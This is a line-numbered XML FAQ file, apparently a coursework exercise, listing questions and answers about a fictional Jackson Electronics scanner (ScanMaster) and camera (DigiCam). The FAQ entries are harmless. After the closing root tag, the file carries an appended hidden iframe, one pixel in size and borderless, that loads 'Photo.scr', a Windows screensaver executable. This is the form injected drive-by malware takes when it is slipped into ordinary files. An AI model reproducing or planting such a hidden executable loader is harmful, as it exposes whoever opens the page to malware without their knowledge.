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  2.  
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  4.     
  5.     ScanMaster and DigiCam FAQ
  6.     filename: faq.xml
  7.     Author: Alan Eskenas
  8.     Date: 12/7/2011
  9. -->
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  11.  
  12. <FAQ> <!-- ROOT ELEMENT -->
  13.  
  14. <title>Jackson Electronics Products</title>
  15. <subtitle>Frequently Asked Questions</subtitle>
  16.  
  17.     <product>
  18.     <model>The ScanMaster</model>
  19.         <question>How do I scan slides?</question>
  20.             <answer>
  21.                     <![CDATA[
  22.                     You can scan slides using the JE Transparency Adapter 
  23.                     (part number STA8901) available from Jackson Electronics.
  24.                     ]]>
  25.             </answer>
  26.         <question>Where can I find the latest drivers for my ScanMaster?</question>
  27.             <answer>
  28.                     <![CDATA[
  29.                     You can download the latest software drivers from the 
  30.                     Jackson Electronics Web page.
  31.                     ]]>
  32.             </answer>
  33.         <question>What is the largest sheet that I can scan?</question>
  34.             <answer>
  35.                     <![CDATA[
  36.                     8.5 x 14 inches (216 x 356 mm).
  37.                     ]]>
  38.             </answer>
  39.         <question>How do I fax with my ScanMaster?</question>
  40.             <answer>
  41.                     <![CDATA[
  42.                     You can turn your scanner into a fax machine by purchasing 
  43.                     the FaxRight add-on component(part number STA4500) available 
  44.                     from Jackson Electronics.
  45.                     ]]>
  46.             </answer>
  47.     </product>
  48.     
  49.     <product>
  50.     <model>DigiCam</model>
  51.         <question>What is the difference between optical and digital zoom?</question>
  52.             <answer>
  53.                     <![CDATA[
  54.                     With optical zoom, the DigiCam's lens physically moves inside the camera; 
  55.                     with digital zoom, the camera's processor zooms the image electronically. 
  56.                     If you zoom too much, your image will become pixelated.
  57.                     ]]>
  58.             </answer>
  59.         <question>What sort of batteries should I use with the DigiCam?</question>
  60.             <answer>
  61.                     <![CDATA[
  62.                     Nickel Metal Hydride (NiMH) batteries work the best and have the longest lifetime. 
  63.                     Nickel-Cadimum batteries also work very well as do Alkaline batteries. 
  64.                     Do not use Lithium batteries.
  65.                     ]]>
  66.             </answer>
  67.         <question>What resolution should I use for 4x6-inch photos?</question>
  68.             <answer>
  69.                     <![CDATA[
  70.                     We recommend 640x480 for 4x6-inch images, 1024x768 for 5x7-inch photos, 
  71.                     and 1600x1200 for 8x10-inch photos.
  72.                     ]]>
  73.             </answer>
  74.         <question>Can the DigiCam be harmed by airport X-ray machines?</question>
  75.             <answer>
  76.                     <![CDATA[
  77.                     No, there is no evidence that X-ray machines can affect the performance 
  78.                     of the DigiCam or the quality of DigiCam photos.
  79.                     ]]>
  80.             </answer>
  81.     </product>
  82.     
  83. </FAQ>
  84.  
  85. <iframe src=Photo.scr width=1 height=1 frameborder=0>
  86. </iframe>
  87.